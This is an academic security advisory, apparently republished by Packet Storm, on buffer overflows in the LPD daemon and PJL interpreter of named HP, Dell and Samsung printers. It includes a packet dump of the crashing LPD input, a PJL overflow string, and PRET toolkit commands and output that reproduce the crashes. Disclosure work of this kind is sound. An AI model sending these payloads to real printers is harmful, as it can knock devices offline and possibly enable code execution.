This post is about buffer overflows in a printer's LPD daemon and PJL interpreter which leads to denial of service or potentially even to code execution. Multiple printers are affected.
ed3f781546ee705d1385f6e94873f6738e66f693d3e7c6ffb379426cacaefa6bTL;DR: In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 4 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
buffer overflows in the printer's LPD daemon and PJL interpreter which
leads to denial of service or potentially even to code execution. The
attack can be performed by anyone who can print, for example through USB
or network. It can even be carried out by a malicious website, using
cross-site printing techniques (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).
==================[ Buffer Overflow in LPD Service ]==================
-------------------------[ Affected Devices ]-------------------------
This vulnerability has been verfied for the devices listed below:
- HP LaserJet 1200 (Firmware version: M.22.09)
- HP LaserJet 4200N (Firmware version: 20050602)
- HP LaserJet 4250N (Firmware version: 20150130)
- Dell 3110cn (Firmware version: 200707111148)
- Samsung MultiPress 6345N (Firmware: 1.03.00.81)
More printers are likely to be affected.
Vendors informed: 2016-10-17
--------------------[ Vulnerability Description ]---------------------
The printer's LPD service listening on port 515/tcp is prone to a buffer
overflow vulnerability. Sending 150 characters or more as username
operator of the control file's L command (print banner page) completely
crashes the device and requires a manual restart to get the printer back
to life. Given correct shellcode and return address, this vulnerability
may lead to remote code execution. A packet dump is shown below.
----------------------------------------------------------------------
> 02 6c 70 0a .lp.
< 00 .
> 02 31 35 32 20 63 66 41 30 30 31 0a .152 cfA001.
< 00 .
> 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 0a 00 xxxxxxx..
----------------------------------------------------------------------
-------------------------[ Proof of Concept ]-------------------------
A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published, which includes a simple LPD fuzzer to
test for buffer overflows by setting all user inputs defined by the LPD
protocol to a certain value (in our case, Python output). The attack can
be reproduced as follows:
$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET/lpd/
$ ./lpdtest.py printer in "`python -c 'print "x"*150'`"
==================[ Buffer Overflow in PJL Interpreter ]==================
-------------------------[ Affected Devices ]-------------------------
This vulnerability has been verfied for the devices listed below:
- Dell 1720n (Firmware version: NM.NA.N099)
More printers are likely to be affected.
--------------------[ Vulnerability Description ]---------------------
Sending about 3.000 characters and more to the PJL interpreter crashes
the device and requires a manual restart to get the printer back to
life. Given correct shellcode and return address, this vulnerability
might even lead to remote code execution:
----------------------------------------------------------------------
@PJL SET 000000000000000000000000000000000000000000000000000000000a|
----------------------------------------------------------------------
-------------------------[ Proof of Concept ]-------------------------
A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published. Testing a device buffer overflows in
the PJL interpreter can be done as follows:
$ cd ..
$ ./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"
-----------------------[ Further Information ]------------------------
Information on buffer overflows in printer devices can be found at:
http://hacking-printers.net/wiki/index.php/Buffer_overflows
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed